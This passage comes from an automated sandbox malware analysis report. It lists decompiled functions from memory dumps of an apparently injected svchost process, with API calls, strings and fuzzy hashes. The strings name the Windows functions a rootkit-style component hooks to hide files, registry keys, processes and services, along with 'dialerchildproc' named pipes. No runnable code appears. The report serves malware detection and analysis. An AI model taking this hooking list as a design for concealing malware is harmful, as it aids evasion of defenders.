lstrlenW.KERNEL32 ref: 0000016C211C1432
GetProcessHeap.KERNEL32 ref: 0000016C211C1440
HeapAlloc.KERNEL32 ref: 0000016C211C144E
StrCpyW.SHLWAPI ref: 0000016C211C1470
GetProcessHeap.KERNEL32 ref: 0000016C211C1485
HeapFree.KERNEL32 ref: 0000016C211C1493

Strings

d, xrefs: 0000016C211C1365

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 0f8a8ebe5fd4ef37318d40ee3baee161bd6483ae9e5b25de17ee9b09ef9d83c4
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 9A514EBA224B45D3EB14CF62E9543AAB3A1F7E8B85F048128DF8947B14DF39C095C780

Function 0000016C211612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000016C21161326
GetProcessHeap.KERNEL32 ref: 0000016C21161334
HeapAlloc.KERNEL32 ref: 0000016C21161345
RegEnumValueW.ADVAPI32 ref: 0000016C211613A1

Part of subcall function 0000016C21161554: StrCmpIW.SHLWAPI ref: 0000016C21161585

GetProcessHeap.KERNEL32 ref: 0000016C211613E9
HeapAlloc.KERNEL32 ref: 0000016C211613F7
GetProcessHeap.KERNEL32 ref: 0000016C2116141B
HeapFree.KERNEL32 ref: 0000016C21161429
lstrlenW.KERNEL32 ref: 0000016C21161432
GetProcessHeap.KERNEL32 ref: 0000016C21161440
HeapAlloc.KERNEL32 ref: 0000016C2116144E
StrCpyW.SHLWAPI ref: 0000016C21161470
GetProcessHeap.KERNEL32 ref: 0000016C21161485
HeapFree.KERNEL32 ref: 0000016C21161493

Strings

d, xrefs: 0000016C21161365

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 622ac38e8802332a2917ce51547cf687e17fdbf1616d804901f4461195bbe5d1
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: DF51497A654B8496EB14CB62E9543AAB3A1F7D8B81F048128DF8907F14DF3AC096C780

Function 0000016C211C1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000016C211C1EBF

Part of subcall function 0000016C211C2174: GetModuleHandleA.KERNEL32 ref: 0000016C211C218C
Part of subcall function 0000016C211C2174: GetProcAddress.KERNEL32 ref: 0000016C211C219D

Part of subcall function 0000016C211C5C10: GetCurrentThreadId.KERNEL32 ref: 0000016C211C5C4B

Strings

EnumServicesStatusExW, xrefs: 0000016C211C1FB1, 0000016C211C1FD2
NtEnumerateValueKey, xrefs: 0000016C211C1F76
EnumServiceGroupW, xrefs: 0000016C211C1F90
NtQuerySystemInformation, xrefs: 0000016C211C1EE5
NtQueryDirectoryFile, xrefs: 0000016C211C1F1F
NtQueryDirectoryFileEx, xrefs: 0000016C211C1F3C
NtResumeThread, xrefs: 0000016C211C1F02
NtEnumerateKey, xrefs: 0000016C211C1F59
advapi32.dll, xrefs: 0000016C211C1F97, 0000016C211C1FB8
ntdll.dll, xrefs: 0000016C211C1ECD
sechost.dll, xrefs: 0000016C211C1FD9
NtDeviceIoControlFile, xrefs: 0000016C211C1FF6

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: e367c40c64415ebe3df5ba29661f233409e366902858b138c3f25d2d667f4bc7
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 3E31B87C121A46A1EF08DF55EC717F42321A7E4B47F80551B9F8922DA1AE7AC2C9C3C2

Function 0000016C21161EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000016C21161EBF

Part of subcall function 0000016C21162174: GetModuleHandleA.KERNEL32 ref: 0000016C2116218C
Part of subcall function 0000016C21162174: GetProcAddress.KERNEL32 ref: 0000016C2116219D

Part of subcall function 0000016C21165C10: GetCurrentThreadId.KERNEL32 ref: 0000016C21165C4B

Strings

NtEnumerateKey, xrefs: 0000016C21161F59
NtQuerySystemInformation, xrefs: 0000016C21161EE5
NtResumeThread, xrefs: 0000016C21161F02
sechost.dll, xrefs: 0000016C21161FD9
NtEnumerateValueKey, xrefs: 0000016C21161F76
NtQueryDirectoryFileEx, xrefs: 0000016C21161F3C
EnumServiceGroupW, xrefs: 0000016C21161F90
NtDeviceIoControlFile, xrefs: 0000016C21161FF6
advapi32.dll, xrefs: 0000016C21161F97, 0000016C21161FB8
ntdll.dll, xrefs: 0000016C21161ECD
NtQueryDirectoryFile, xrefs: 0000016C21161F1F
EnumServicesStatusExW, xrefs: 0000016C21161FB1, 0000016C21161FD2

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 65a3869f04434287a2e7461a52d4047f43856702f8c38511b053c3224d04ca12
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 9E31987C105986A0FA08EF64EC716F43321A7E4346F94451B9F9916EA5AF3BC2DAC3C0

Function 0000016C211C23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000016C211C2405
GetCurrentProcessId.KERNEL32 ref: 0000016C211C240F

Part of subcall function 0000016C211C19AC: OpenProcess.KERNEL32 ref: 0000016C211C19CA
Part of subcall function 0000016C211C19AC: IsWow64Process.KERNEL32 ref: 0000016C211C19E0
Part of subcall function 0000016C211C19AC: CloseHandle.KERNEL32 ref: 0000016C211C19FB

CreateFileW.KERNEL32 ref: 0000016C211C2468
WriteFile.KERNEL32 ref: 0000016C211C2490
ReadFile.KERNEL32 ref: 0000016C211C24AF
CloseHandle.KERNEL32 ref: 0000016C211C24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000016C211C243F
\\.\pipe\dialerchildproc64, xrefs: 0000016C211C2438

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 05100e2173929dac6a7f0a0e74b500ed2cf805a217f4a52c9ada1ad1fe11b766
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 7E21327D624B4083EB10CB25F8547AA63A0F3D5B95F544219DF9902FA8DF3DC185CB41

Function 0000016C211623F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000016C21162405
GetCurrentProcessId.KERNEL32 ref: 0000016C2116240F

Part of subcall function 0000016C211619AC: OpenProcess.KERNEL32 ref: 0000016C211619CA
Part of subcall function 0000016C211619AC: IsWow64Process.KERNEL32 ref: 0000016C211619E0
Part of subcall function 0000016C211619AC: CloseHandle.KERNEL32 ref: 0000016C211619FB

CreateFileW.KERNEL32 ref: 0000016C21162468
WriteFile.KERNEL32 ref: 0000016C21162490
ReadFile.KERNEL32 ref: 0000016C211624AF
CloseHandle.KERNEL32 ref: 0000016C211624B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000016C2116243F
\\.\pipe\dialerchildproc64, xrefs: 0000016C21162438

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b8174abafcbed4851b4a6d4f06aa0a09f7f5a9e489b1ae02c01d517591147634
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: C621413A61474083F7109B25F9543AA73A0F3D9BA6F504219DF9902FA8DF3EC189CB40

Function 0000016C211C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000016C211C10AB
RegEnumValueW.ADVAPI32 ref: 0000016C211C110E
GetProcessHeap.KERNEL32 ref: 0000016C211C1155
HeapAlloc.KERNEL32 ref: 0000016C211C1163
GetProcessHeap.KERNEL32 ref: 0000016C211C1187
HeapFree.KERNEL32 ref: 0000016C211C1195

Strings

d, xrefs: 0000016C211C10CE

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 595544e6c8b5eb356c0fe469aa62110ee290ea274f5a14379f819f9652fa861e
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 39415B7B214B80D6EB608F62E8547EAB7A1F3D8B85F008129DFC907A54DF39D1A5CB40

Function 0000016C2116104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000016C211610AB
RegEnumValueW.ADVAPI32 ref: 0000016C2116110E
GetProcessHeap.KERNEL32 ref: 0000016C21161155
HeapAlloc.KERNEL32 ref: 0000016C21161163
GetProcessHeap.KERNEL32 ref: 0000016C21161187
HeapFree.KERNEL32 ref: 0000016C21161195

Strings

d, xrefs: 0000016C211610CE

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: e364fe9ba6e10bce0f5738846fae8b44bfd57472a1e97a05519a5ea21eddf3a3
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 4F414937614B80D6E7608F62E8547AAB7A1F3D8B85F008129DF8907B58DF3AD1A5CB40

Function 0000016C211C75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000016C211C7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000016C211C766A
_RTC_Initialize.LIBCMT ref: 0000016C211C7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000016C211C76BE
__scrt_release_startup_lock.LIBCMT ref: 0000016C211C76E9

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 878b1894e0747b522d643bc06064195b8b649effffff20599e8b1fc8f6cbaf3d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: EC81D13D61474186FA509B699C613FA6290AFE5782F04401DDFC467FD6DABBC8C18782

Function 0000016C211675F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000016C21167618
__scrt_acquire_startup_lock.LIBCMT ref: 0000016C2116766A
_RTC_Initialize.LIBCMT ref: 0000016C21167698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000016C211676BE
__scrt_release_startup_lock.LIBCMT ref: 0000016C211676E9

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 05e0b7d978977c430931cf4a1903596006320a49131ddce92157791e861fd35d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: A081AE396146C186FA50AF299C613F96290AFF5782F18442DDFC947F96DB3BC8C68780

Function 0000016C211369F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000016C21136A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000016C21136A6A
_RTC_Initialize.LIBCMT ref: 0000016C21136A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000016C21136ABE
__scrt_release_startup_lock.LIBCMT ref: 0000016C21136AE9

Memory Dump Source

Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 0f3e0a6d576d6c1da82d8e22548eba1d662a50e86af85afd0fdb011be878c5ef
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: C581CF396006C586FB249B169C713F96690ABF1B82F04402D9F8547F9EDB7AC6C6C7C0

Function 0000016C211C9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000016C211C9889
GetLastError.KERNEL32 ref: 0000016C211C9897
LoadLibraryExW.KERNEL32 ref: 0000016C211C98C1
FreeLibrary.KERNEL32 ref: 0000016C211C9907
GetProcAddress.KERNEL32 ref: 0000016C211C9913

Strings

api-ms-, xrefs: 0000016C211C98A9

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: fcb0aebfef704a42b30bb54349db129c50c363eafd5b8195f94279687c22beb1
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4031E63D212B4591EE11DF02AC207FA2394B7A8BA2F19051CDFAD17B88EF39C0C58381

Function 0000016C21169804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000016C21169889
GetLastError.KERNEL32 ref: 0000016C21169897
LoadLibraryExW.KERNEL32 ref: 0000016C211698C1
FreeLibrary.KERNEL32 ref: 0000016C21169907
GetProcAddress.KERNEL32 ref: 0000016C21169913

Strings

api-ms-, xrefs: 0000016C211698A9

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: b1452ed8ec4b996183525b8b8172cdbcf408286b410b2c5af2c88b7c0f27d6c6
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: A031C9392126C496EE15DF02AC207F96394B7A4BA2F19451DDFAD47B44EF3AC0C5C380

Function 0000016C211D1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000016C211D1BCD
GetLastError.KERNEL32 ref: 0000016C211D1BD9
CloseHandle.KERNEL32 ref: 0000016C211D1BF1
CreateFileW.KERNEL32 ref: 0000016C211D1C1C
WriteConsoleW.KERNEL32 ref: 0000016C211D1C3B

Strings

CONOUT$, xrefs: 0000016C211D1BFD

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 0face363e2cb8c0bee3317b607126d7ba7bb2ac6b9f65265e627c2b573a77838
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: E5119339334B4086EB508B16EC6436963A0F7E9FE5F004218EF9D87B94DF3AC5848780

Function 0000016C21171B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000016C21171BCD
GetLastError.KERNEL32 ref: 0000016C21171BD9
CloseHandle.KERNEL32 ref: 0000016C21171BF1
CreateFileW.KERNEL32 ref: 0000016C21171C1C
WriteConsoleW.KERNEL32 ref: 0000016C21171C3B

Strings

CONOUT$, xrefs: 0000016C21171BFD

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: bf7e9455a38d92cba8f76b32b6ffd9fc638bc3fb2415792378c2fdc68b3d51de
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 93118E35224B4086E7508B42EC643AA77A0F3E8BE6F000218EF9987B94DB3AC5858780

Function 0000016C211C5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C211C5C4B
GetThreadContext.KERNEL32 ref: 0000016C211C5DB5

Part of subcall function 0000016C211C5A40: GetCurrentThreadId.KERNEL32 ref: 0000016C211C5A44

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: a2a379eb7d189b7631a3c57ad6d33e18e6a529f2b645e47664a66a9de8cede0a
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: ECD19E7A208B8881DA709B19E8943AA77B0F7D8B85F104216EFCD57FA5DF39C581CB41

Function 0000016C21165C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000016C21165C4B
GetThreadContext.KERNEL32 ref: 0000016C21165DB5

Part of subcall function 0000016C21165A40: GetCurrentThreadId.KERNEL32 ref: 0000016C21165A44

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: ab12cf9fa18d98c0c7b20da7bd6a79f10d6279ca1783c6524d2b18bed3e726da
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: F8D18F7A204B8885DA709B19E8A43AA77A0F7D8B85F104116EFCD47FA5DF3EC581CB40

Function 0000016C211C30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211C30D7
HeapAlloc.KERNEL32 ref: 0000016C211C30EA
StrCmpNIW.SHLWAPI ref: 0000016C211C316B
GetProcessHeap.KERNEL32 ref: 0000016C211C31D1
HeapFree.KERNEL32 ref: 0000016C211C31DF

Strings

dialer, xrefs: 0000016C211C3164

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: f9a115f38d00452e5ea098e85ee1cb7d94b79de93f4c0b3c8a0ba701e1bb5430
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 8D31A239721B5186EB15DF56AC242BA63B0FBE4B96F0440289FC817F54EB3AC4E1C784

Function 0000016C211630B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000016C211630D7
HeapAlloc.KERNEL32 ref: 0000016C211630EA
StrCmpNIW.SHLWAPI ref: 0000016C2116316B
GetProcessHeap.KERNEL32 ref: 0000016C211631D1
HeapFree.KERNEL32 ref: 0000016C211631DF

Strings

dialer, xrefs: 0000016C21163164

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 76eb0573478cb9e543d378db3824b3ce4a5ca1622bba97411466568bda94d0b6
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 80318439711B91C2EB159F16AC642BA63B0FBA4796F0440289FDD07F54EF3AC4E28780

Function 0000016C211C1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000016C211C1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000016C211C1A58
PathFindFileNameW.SHLWAPI ref: 0000016C211C1A67
lstrlenW.KERNEL32 ref: 0000016C211C1A73
StrCpyW.SHLWAPI ref: 0000016C211C1A86
CloseHandle.KERNEL32 ref: 0000016C211C1A94

Memory Dump Source

Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 330b39928e8d4a0512e4b0e5befe440e038935c0cdc715f05207bc680191c48f
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 3D016179320B8196EB10DB16A8683AA63A1F798FC2F484039CF8943B54DE3DC5C5C380

Function 0000016C21161A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000016C21161A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000016C21161A58
PathFindFileNameW.SHLWAPI ref: 0000016C21161A67
lstrlenW.KERNEL32 ref: 0000016C21161A73
StrCpyW.SHLWAPI ref: 0000016C21161A86
CloseHandle.KERNEL32 ref: 0000016C21161A94

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 6df4d5b338569d3bd063ea9b31b9fdceee70e06f8d8edbbfcb255024ecb4c22d
